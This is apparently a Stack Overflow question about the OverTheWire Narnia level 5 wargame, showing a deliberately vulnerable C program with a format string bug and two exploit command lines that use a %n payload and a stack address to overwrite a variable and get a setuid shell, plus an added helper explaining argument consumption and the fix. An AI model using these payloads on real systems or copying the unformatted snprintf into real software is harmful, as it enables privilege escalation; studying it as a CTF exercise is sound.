#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>   /* setreuid(), geteuid() */

int main(int argc, char **argv){
    int i = 1;
    char buffer[64];

    /* argv[1] is passed as the format string itself: this is the format string bug */
    snprintf(buffer, sizeof buffer, argv[1]);
    buffer[sizeof (buffer) - 1] = 0;
    printf("Change i's value from 1 -> 500. ");

    if(i==500){
        printf("GOOD\n");
        setreuid(geteuid(),geteuid());
        system("/bin/sh");
    }

    printf("No way...let me give you a hint!\n");
    /* strlen() returns size_t, so print it with %zu */
    printf("buffer : [%s] (%zu)\n", buffer, strlen(buffer));
    printf ("i = %d (%p)\n", i, (void *)&i);
    return 0;
}

Hi! I'm working on a ctf exercise (Overthewire 5 level, Narnia). Here is the code that I've tried, but I don't understand why the second option isn't working.

This one works

 ./narnia5 $(python -c 'print "\xe0\xd6\xff\xff" + "%496x%1$n"')

With this I get SegFault

./narnia5 $(python -c 'print "\xe0\xd6\xff\xff" + "%496x%n"')

The principle is the same in both variants: you pass the address and the %n specifier reads the amount of bytes passed; because the address takes 4 bytes, we add 496 bytes with padding. In both of them %n will read the next address on the stack, as I understand. Thanks for your answers.

Lundin
  • Welcome to SO. You should not assume that anyone knows what this means: "ctf exercise(Overthewire 5 level, Narnia)". You need to describe what you want to achieve. – Gerhardh Dec 05 '20 at 13:42
  • 2
    @Gerhardh The question is tagged with ctf and cybersecurity, *and* the question describes it's about a format string vulnerability. People asking a question about OpenGL do not need to explain what OpenGL is if they tagged the question appropriately. So I disagree with your comment. People in this field of work know exactly what OP means. – Cheatah Dec 05 '20 at 14:27

0 Answers
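Added example, not part of the question or of any answer: a small C walker over a printf-style format that reports which variadic argument the first `%n` takes its pointer from. It follows the rule that unnumbered conversions consume arguments in order while `N$` names argument N. The function name `n_arg_index` and the `AAAA` stand-in for the four address bytes are assumptions of this example; POSIX leaves mixing numbered and unnumbered conversions undefined.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Returns the 1-based index of the variadic argument from which the first %n
 * in fmt takes its pointer, or 0 if fmt contains no %n.
 * Simplified model: unnumbered conversions take the next argument in order,
 * "N$" conversions take argument N; '*' widths/precisions are not modelled. */
int n_arg_index(const char *fmt)
{
    int next = 1;                        /* next argument for unnumbered conversions */
    for (const char *p = fmt; *p; p++) {
        if (*p != '%')
            continue;
        p++;
        if (*p == '%')                   /* "%%" is a literal percent sign */
            continue;
        int pos = 0, num = 0;            /* pos: explicit "N$" position, 0 if absent */
        const char *q = p;
        while (isdigit((unsigned char)*q))
            num = num * 10 + (*q++ - '0');
        if (q > p && *q == '$') {        /* digits followed by '$': positional */
            pos = num;
            p = q + 1;
        }
        while (*p && strchr("-+ #0", *p)) p++;       /* flags */
        while (isdigit((unsigned char)*p)) p++;      /* field width */
        if (*p == '.') {                             /* precision */
            p++;
            while (isdigit((unsigned char)*p)) p++;
        }
        while (*p && strchr("hlqjztL", *p)) p++;     /* length modifiers */
        if (*p == '\0')
            break;                       /* truncated directive at end of string */
        int used = pos ? pos : next++;   /* argument this conversion consumes */
        if (*p == 'n')
            return used;
    }
    return 0;
}

int main(void)
{
    /* Constructed samples: "AAAA" stands in for the four literal address bytes. */
    const char *samples[] = { "AAAA%496x%1$n", "AAAA%496x%n" };
    for (int k = 0; k < 2; k++)
        printf("%-16s -> %%n uses argument %d\n", samples[k], n_arg_index(samples[k]));
    return 0;
}
```

For the two formats in the question it reports argument 1 for `%496x%1$n` and argument 2 for `%496x%n`, because `%496x` has already consumed the first argument. The bug itself disappears when the call is written `snprintf(buffer, sizeof buffer, "%s", argv[1])`.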